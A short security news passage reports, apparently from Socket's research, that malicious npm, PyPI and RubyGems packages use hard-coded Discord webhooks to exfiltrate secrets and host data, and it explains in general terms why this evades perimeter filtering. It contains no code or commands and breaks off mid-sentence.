Threat Actors Exploit Discord Webhooks for C2 via npm, PyPI, and Ruby Packages

Threat actors are increasingly abusing Discord webhooks as covert command-and-control (C2) channels inside open-source packages, enabling stealthy exfiltration of secrets, host telemetry, and developer environment data without standing up bespoke infrastructure.

Socket’s Threat Research Team has documented active abuse across npm, PyPI, and RubyGems, where hard-coded Discord webhook URLs act as write-only sinks to siphon data over HTTPS to attacker-controlled channels.

Because webhook posts resemble ordinary JSON traffic to a widely allowed domain, these operations often bypass perimeter filtering and signature-based controls.

How Discord Webhooks Become Exfiltration Pipes

Discord webhooks are HTTPS endpoints that require only possession of a URL containing an ID and secret token to post messages to a channel.

Live endpoints typically return 204 No Content on success or 200 OK with ?wait=true, while 401, 404, and 429 indicate invalid tokens, deletion, or rate limits respectively.

Critically, webhook URLs are write-only—defenders cannot ...